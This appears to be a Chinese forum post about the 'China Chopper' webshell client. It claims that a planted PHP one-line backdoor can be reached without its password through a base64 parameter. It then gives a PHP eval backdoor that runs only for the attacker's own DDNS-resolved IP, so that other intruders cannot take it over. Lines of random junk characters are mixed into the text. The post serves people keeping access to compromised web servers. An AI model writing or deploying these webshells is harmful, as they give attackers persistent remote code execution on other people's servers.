今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
2 }3 C6 s- z$ r2 l, L( b4 }2 B* J1 [/ e! w$ p) f/ |
就算你设置了密码,使用了eval($_REQUEST['moyo']);
+ |5 [5 y& w. j3 b" l7 W( E. [. m
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
6 P! I. p# E8 d& {" V1 P+ A2 z# Q8 B' |- e
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
) r, ?" P9 }' r f7 y4 H7 [! ~
9 C( ^ \+ G- \直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
' t. _' g( w# p# }/ p1 `* K# p( p, L# A. _3 \' d R1 o. d
不知道是设计缺陷还是故意留的后门
; U( F8 S; @$ x2 [& u! A$ L1 f. \
3 Y0 D, i) `9 \, q- G2 y8 c如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
: }3 v% z* {# I+ H ]& l/ i0 i( _* B. W% d X4 G& q
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
% Z# Z! O8 a7 V9 D3 B! l
3 N- r0 M8 p( d' E$ b8 s3 b然后一句话后门这样写
; ^, H5 x q; o( X4 K5 A$ }+ h
: L8 j% ?' I' W( U5 `) I<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
- _: E: R ^1 l* F, u0 }1 u, }这样就可以让一句话后门只允许自己的电脑连接了! r6 A: w( `1 | P
5 K J( ?" s( d, ] |